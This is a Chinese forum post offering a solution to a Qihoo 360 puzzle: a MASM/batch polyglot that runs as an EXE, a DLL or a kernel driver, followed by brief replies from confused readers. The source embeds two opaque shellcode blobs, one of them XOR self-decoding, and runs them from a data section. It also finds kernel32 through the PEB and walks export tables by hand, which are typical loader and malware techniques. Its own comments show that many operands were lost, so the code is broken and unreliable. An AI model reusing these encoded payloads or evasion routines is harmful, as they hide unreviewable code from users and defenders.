奇虎360第四题的解法
代码:
;@echo off
;goto make
.386                                    ; 32-bit code: every pointer/ABI assumption in this file is Win32
.model flat, stdcall                    ; flat memory; stdcall default, so `invoke` pushes right-to-left and the callee pops
option casemap:none                     ; identifiers are case-sensitive (DbgPrt vs DbgPrint etc. must match exactly)
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; I N C L U D E F I L E S
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
include \masm32\include\w2k\ntstatus.inc
include \masm32\include\w2k\ntddk.inc
include \masm32\include\w2k\ntoskrnl.inc
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data
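; ShellCodeExe - raw machine code that usermain enters with `call eax` when
; the image is running as the EXE. It is an opaque payload here: the first
; bytes look like a short self-decoding loop (a single-byte XOR over the
; rest of the blob), so the bytes that follow are not the real
; instructions and cannot be reviewed from this listing alone. The
; trailing 'i am in exe' string is a plain marker. Executing a .data blob
; requires that section to be mapped executable; under DEP/NX it faults.
; NOTE(review): the label and `db` were fused ("ShellCodeExedb") in the
; extracted text; they are separated here so the line assembles.
ShellCodeExe db 0ebh,00eh,05bh,04bh,033h,0c9h,0b1h,09bh,080h,034h,00bh,0feh,0e2h,0fah,0ebh,005h
db 0e8h,0edh,0ffh,0ffh,0ffh,017h,07bh,0feh,0feh,0feh,0a1h,09ah,05fh,0ceh,0feh,0feh
db 0feh,075h,0beh,0f2h,075h,08eh,0e2h,053h,075h,096h,0f6h,075h,009h,094h,0fch,0a7h
db 016h,0dbh,0feh,0feh,0feh,01ch,007h,096h,0cdh,0cch,0feh,0feh,096h,08bh,08dh,09bh
db 08ch,0aah,001h,0e8h,075h,016h,094h,0ffh,0a7h,016h,0f2h,0feh,0feh,0feh,01ch,007h
db 0afh,0a9h,0a9h,0afh,001h,0a8h,0f6h,001h,0a8h,0fah,0afh,0a8h,075h,08bh,0c2h,075h
db 08ah,0d0h,086h,0fdh,00bh,0a8h,075h,088h,0deh,0fdh,00bh,0cdh,037h,0b7h,0bfh,053h
db 0fdh,03bh,0cdh,025h,0f1h,040h,0eeh,0c4h,028h,08ah,0f6h,03fh,035h,0f9h,0fdh,024h
db 0beh,015h,00fh,0c5h,0e1h,08bh,019h,0a0h,075h,0a0h,0dah,0fdh,023h,098h,075h,0f2h
db 0b5h,075h,0a0h,0e2h,0fdh,023h,075h,0fah,075h,0fdh,03bh,055h,0a0h,0a7h,03dh,016h
db 088h,001h,001h,001h,0cch,08ah,06fh,0f2h,09dh,077h,02fh,0b1h,094h,0f4h,0c6h,0e0h
db 'i am in exe',0;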
; ShellCodeDll - raw machine code executed when the image has been loaded
; as a DLL (usermain relocates its address by the load delta first).
; Opaque payload as far as this listing goes; the byte values near its
; tail spell "LoadLibraryA", "user32" and "MessageBoxA", so it presumably
; resolves those by itself and shows the 'i am in the dll' string that
; follows - TODO confirm by disassembly, not by the strings alone.
; Self-contained API resolution of this kind, running out of a data
; section, is the pattern endpoint detection keys on.
ShellCodeDll db 0E9h,096h,000h,000h,000h,05Ah,064h,0A1h,030h,000h,000h,000h,08Bh,040h
db 0Ch,08Bh,070h,01Ch,0ADh,08Bh,040h,008h,050h,052h,06Ah,00Ch,0E8h,01Eh
db 00h,000h,000h,05Bh,083h,0C3h,00Dh,053h,0FFh,0D0h,083h,0C3h,007h,053h
db 6Ah,00Bh,0E8h,00Ch,000h,000h,000h,05Bh,083h,0C3h,00Ch,06Ah,000h,053h
db 53h,06Ah,000h,0FFh,0D0h,08Bh,0D8h,083h,0C0h,03Ch,08Bh,000h,003h,0C3h
db 80h,038h,050h,075h,049h,08Bh,040h,078h,003h,0C3h,050h,08Bh,0C8h,08Bh
db 49h,014h,08Bh,040h,020h,003h,0C3h,055h,08Bh,0E8h,033h,0D2h,051h,08Bh
db 00h,003h,0C3h,08Bh,0F8h,08Bh,074h,024h,014h,08Bh,04Ch,024h,010h,0FCh
db 0F3h,0A6h,075h,017h,083h,0C4h,004h,08Bh,044h,024h,004h,08Bh,040h,01Ch
db 03h,0C3h,0C1h,0E2h,002h,003h,0C2h,08Bh,000h,003h,0C3h,0EBh,00Bh,042h
db 83h,0C5h,004h,08Bh,0C5h,059h,0E2h,0CCh,033h,0C0h,05Dh,059h,0C2h,004h
db 00h,0E8h,065h,0FFh,0FFh,0FFh,04Ch,06Fh,061h,064h,04Ch,069h,062h,072h
db 61h,072h,079h,041h,000h,075h,073h,065h,072h,033h,032h,000h,04Dh,065h
db 73h,073h,061h,067h,065h,042h,06Fh,078h,041h,000h
db 'i am in the dll',0;
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; C O D E
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.code
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetKernel32
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetKernel32 - returns in eax a module base that the rest of the file
; treats as kernel32, found by reading a per-thread structure through the
; fs segment and chasing pointers from there.
; ABI:   stdcall, no parameters; esi preserved via `uses`
; Out:   eax = module base (never validated - callers assume success)
; Clobb: eax, flags
; NOTE(review): every bracketed memory operand in this proc was lost when
; the post was extracted (the lines end in a bare comma). Do not guess
; them back in; recover them from the original listing. As written the
; proc does not assemble.
; Defender note: an fs-relative read followed by pointer chasing and a
; lodsd is the hand-written "find kernel32 without an import" sequence
; that shellcode uses; it is a strong static signature.
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
GetKernel32 proc uses esi
assume fs:nothing                       ; let MASM accept an fs: override on the next load
mov eax,fs:                             ; <- operand lost in extraction
assume fs:error                         ; re-disable fs: addressing
mov eax,                                ; <- operand lost in extraction
mov esi,                                ; <- operand lost in extraction
lodsd                                   ; eax = [esi], esi += 4 (assumes DF clear - nothing here sets it)
mov eax,                                ; <- operand lost in extraction
ret
GetKernel32 endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; MyGetProcAddress
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DWORD MyGetProcAddress(DWORD ImageBase, DWORD FuncName)
; Hand-rolled GetProcAddress: walks the export directory of the PE image
; at ImageBase and returns the address of the export whose name matches
; FuncName exactly (the compare covers the terminating NUL as well).
; ABI:   stdcall; ebx/ecx/esi/edi preserved via `uses`
; In:    ImageBase = module base, FuncName = NUL-terminated ASCII name
; Out:   eax = function address, or 0 when the PE signature check fails
;        or no name matches
; Clobb: eax, edx, flags, DF (cld)
; NOTE(review): every bracketed memory operand was lost in extraction
; (lines ending in a bare comma, and the `cmp DWORD PTR ,` of the PE
; check). Recover them from the original listing rather than guessing;
; the comments on the table walk below are what the shl/and arithmetic
; suggests, not what the lost operands prove.
; Defender note: a manual export-table walk keyed on the 'PE\0\0'
; signature (00004550h) plus a byte-wise name compare is the
; characteristic API-resolution routine of loaders and shellcode.
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
MyGetProcAddress proc uses ebx ecx esi edi ImageBase:DWORD,FuncName:DWORD
LOCAL FunNameArray:DWORD                ; cursor into a table of DWORD entries (advanced by 4 per name)
LOCAL PE:DWORD                          ; VA of the PE header
LOCAL Count:DWORD                       ; index of the name currently being compared
LOCAL IED:DWORD                         ; VA of the export directory
LOCAL iedN:DWORD                        ; second value read from the PE header (stored, never read again)
LOCAL flen:DWORD                        ; strlen(FuncName) + 1: bytes compared, including the NUL
mov Count,0
; --- flen = length of FuncName including the terminator ---------------
mov eax,FuncName
test eax,eax
je tmpret                               ; NULL name: flen becomes 0 and the compare below is meaningless
lea edx,DWORD PTR ds:                   ; <- operand lost in extraction (edx = start of the string)
strloop:
mov cl,BYTE PTR ds:                     ; <- operand lost in extraction
inc eax
test cl,cl
jnz strloop                             ; eax stops one past the NUL
sub eax,edx                             ; eax = bytes including the NUL
tmpret:
mov flen,eax
; --- locate the PE header and the export directory --------------------
mov eax,ImageBase
add eax,3ch                             ; e_lfanew
mov eax,                                ; <- operand lost in extraction
add eax,ImageBase
cmp DWORD PTR ,00004550h                ; <- operand lost in extraction; 'PE\0\0' signature
jne NotFound                            ; not a PE image -> return 0
mov PE,eax
mov eax,                                ; <- operand lost in extraction
add eax,ImageBase
mov IED,eax
mov eax,                                ; <- operand lost in extraction
add eax,ImageBase
mov iedN,eax                            ; stored but never used
mov eax,IED
mov eax,                                ; <- operand lost in extraction
add eax,ImageBase
mov FunNameArray,eax
mov ecx,IED
mov ecx,                                ; <- operand lost in extraction; ecx = iteration count for FindLoop
; --- compare each exported name against FuncName ----------------------
FindLoop:
mov eax,                                ; <- operand lost in extraction
add eax,ImageBase                       ; eax = VA of the current export name
mov esi,FuncName
mov edi,eax
push ecx                                ; save the outer loop counter; repe needs ecx
mov ecx,flen
cld
repe cmpsb                              ; with flen == 0 nothing runs and ZF is left over from the add above
jne FindNext
add esp,4                               ; discard the saved ecx (match found, the loop is not resumed)
; presumably: index a WORD table by Count, then a DWORD table by the result
mov eax,IED
mov eax,                                ; <- operand lost in extraction
add eax,ImageBase
shl Count,1                             ; Count *= 2 (WORD entries); Count is not used again after this
add eax,Count
mov eax,                                ; <- operand lost in extraction
and eax,0000ffffh                       ; keep the low 16 bits (a WORD ordinal)
mov ebx,eax
mov eax,IED
mov eax,                                ; <- operand lost in extraction
add eax,ImageBase
shl ebx,2                               ; ordinal *= 4 (DWORD entries)
mov eax,                                ; <- operand lost in extraction
add eax,ImageBase                       ; RVA -> VA
jmp Found
FindNext:
inc Count
add FunNameArray,4                      ; next DWORD entry
mov eax,FunNameArray
pop ecx
loop FindLoop                           ; ecx--; keeps going while nonzero (an initial ecx of 0 wraps to 0ffffffffh)
NotFound:
xor eax,eax
Found:
ret
MyGetProcAddress endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; usermain
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
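;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; usermain - user-mode path, reached from DriverEntry when the image is
; executing below 2 GB (loaded as an EXE or a DLL rather than as a
; driver). Resolves GetModuleHandleA by hand and uses
; GetModuleHandleA(NULL) to tell the two cases apart: when the main
; module's base equals this image's link base (10000h, the linker's
; /base switch in the make section) we are the EXE; otherwise we were
; loaded as a DLL into some other process and must relocate ourselves.
; ABI:   stdcall, no parameters; ebx preserved via `uses` (the DLL path
;        uses it as the relocation delta and ebx is callee-saved in Win32)
; Out:   nothing meaningful (whatever the executed blob leaves in eax)
; Clobb: eax, ecx, edx, flags
; NOTE(review): `lea eax,` in the DLL path lost its operand in extraction;
; recover it from the original listing rather than guessing. Both blobs
; live in .data and are entered with `call eax`, which only works if that
; section is mapped executable (DEP/NX would fault it). The `jmp TheEnd`
; lines were fused ("jmpTheEnd") in the extracted text and are fixed here.
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
usermain proc uses ebx
LOCAL hKer32:DWORD                      ; kernel32 base as found by GetKernel32 (never validated)
LOCAL pGetModuleHandle:DWORD            ; resolved address of GetModuleHandleA
invoke GetKernel32
mov hKer32,eax
; `call GetHandle` pushes the address of the string that follows it, so
; the string becomes the FuncName argument of MyGetProcAddress.
call GetHandle
db "GetModuleHandleA",0
GetHandle:
push hKer32                             ; ImageBase (pushed last: stdcall, right-to-left)
call MyGetProcAddress
mov pGetModuleHandle,eax                ; 0 if the lookup failed - not checked before the call below
push NULL
call pGetModuleHandle                   ; GetModuleHandleA(NULL) = base of the process's main module
cmp eax,10000h                          ; link base of this image (keep in sync with /base in the make section)
jne dll
; --- running as the EXE: the blob is at its link-time address ---------
lea eax,ShellCodeExe
call eax
jmp TheEnd
dll:
; --- loaded as a DLL: ebx = run-time address of @@ minus its link-time
; offset, i.e. the relocation delta of this image -----------------------
call @F
@@:
pop ebx
sub ebx,offset @B
lea eax,                                ; <- operand lost in extraction (presumably ShellCodeDll relocated by ebx - confirm)
call eax
jmp TheEnd
TheEnd:
ret
usermain endp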
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetKernel
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetKernel - returns in eax the base address of the kernel image that
; called DriverEntry, by rounding a start address down to a page and
; stepping to lower addresses one page (1000h) at a time until a page
; begins with "MZ" and the header it points to begins with "PE".
; ABI:   stdcall, no parameters; ecx preserved via `uses`
; Out:   eax = page-aligned image base
; Clobb: eax, flags
; NOTE(review): the start value (`mov eax,`) and the three memory
; operands were lost in extraction; recover them from the original
; listing, do not guess. Presumably the start value is a return address
; inside ntoskrnl - confirm.
; Risk:  there is no lower bound and no check that a page is mapped; if
;        no header is found, or an unmapped page sits between the start
;        and the image base, the read faults - in kernel mode that is a
;        bugcheck, not an exception.
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
GetKernel proc uses ecx
mov eax,                                ; <- operand lost in extraction (scan start)
FindMZ:
and eax,0fffff000h                      ; round down to a page boundary
cmp word ptr ,'ZM'                      ; <- operand lost in extraction; 'ZM' is "MZ" in memory order
jne MoveUp
mov ecx,                                ; <- operand lost in extraction (presumably the e_lfanew field)
add ecx,eax                             ; ecx = candidate PE header VA
cmp word ptr ,'EP'                      ; <- operand lost in extraction; 'EP' is "PE" in memory order
je Found
MoveUp:
sub eax ,1000h                          ; previous page (the label name notwithstanding, addresses go down)
jmp FindMZ
Found:
ret
GetKernel endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; MyDbgPrint
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; MyDbgPrint(DWORD hKer) - resolves DbgPrint from the kernel image whose
; base is hKer (via MyGetProcAddress) and calls it with a fixed message.
; The two `call label / db "..."` pairs are the same trick as in usermain:
; the call pushes the address of the string behind it, so the string
; becomes the next stack argument.
; ABI:   stdcall, one DWORD parameter
; Out:   eax = whatever DbgPrint returned
; Clobb: eax, ecx, edx, flags (DbgPrint is an ordinary C call)
; NOTE(review): the lookup result is not checked; if MyGetProcAddress
; returns 0 the `call eax` below transfers to address 0 and bugchecks the
; machine. DbgPrint is cdecl, so its argument stays on the stack after
; the call; the generated epilogue restores esp from ebp, which hides
; that imbalance.
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
MyDbgPrint proc hKer:DWORD
call DbgPrt                             ; pushes &"DbgPrint" = FuncName argument
db "DbgPrint",0
DbgPrt:
push hKer                               ; ImageBase argument
call MyGetProcAddress                   ; eax = &DbgPrint, or 0 when not found
call MyDbgPrt                           ; pushes &message as DbgPrint's format argument
db "I am in the kernel!",13,10,0
MyDbgPrt:
call eax                                ; DbgPrint(message) - no NULL check on eax
ret
MyDbgPrint endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverEntry
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverEntry - the single entry point of a three-way polyglot image: the
; same code is the EXE entry, the DLL entry and the driver entry. It first
; finds out where it is executing: `call tmpadd1 / pop eax` yields the
; current instruction address, and anything above 7fffffffh is taken to
; be kernel space (the default 2 GB user/kernel split of 32-bit Windows;
; a /3GB boot would break this heuristic - unverified).
; Kernel path: find the kernel image base (GetKernel), DbgPrint a
; message, then return STATUS_DEVICE_CONFIGURATION_ERROR so the driver
; is unloaded again. User path: hand off to usermain.
; ABI:   stdcall with two parameters when called as a driver (the plain
;        `ret` expands to the epilogue that pops them). In user mode the
;        entry was not called with these parameters, hence the `ret 0`
;        there. A DLL entry point is called with three arguments, which
;        `ret 0` does not pop either - presumably tolerated by the
;        loader, but confirm.
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
call tmpadd1
tmpadd1:
pop eax                                 ; eax = address of tmpadd1 at run time
cmp eax,7fffffffh
ja kernel                               ; unsigned compare: >= 80000000h means kernel space
invoke usermain
jmp useret
kernel:
invoke GetKernel
invoke MyDbgPrint,eax                   ; eax = kernel image base
mov eax, STATUS_DEVICE_CONFIGURATION_ERROR   ; deliberate failure status: the driver is not kept loaded
ret                                     ; epilogue pops the two driver parameters
useret:
ret 0                                   ; user-mode entry: pop nothing
DriverEntry endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
end DriverEntry
:make
rem Build section of a polyglot file: MASM stops reading at `end`, and cmd
rem skips everything above because the `;goto make` near the top is parsed
rem with the leading `;` as a separator. ml is pointed at %drv%.bat, so the
rem file itself must be saved as kyo.bat.
set drv=kyo
rem assemble the .bat straight to a COFF object
\masm32\bin\ml /nologo /c /coff %drv%.bat
rem /driver + /subsystem:native produce the .sys; /base:0x10000 must stay in
rem sync with the `cmp eax,10000h` test in usermain
\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:%drv%.sys /subsystem:native %drv%.obj
del %drv%.obj
echo.
太高深了。整点实用的, 高手啊就是看不懂 碰到高手啦,硬是看不懂
{:5_488:} {:5_469:} 一点都不懂呀! 太高的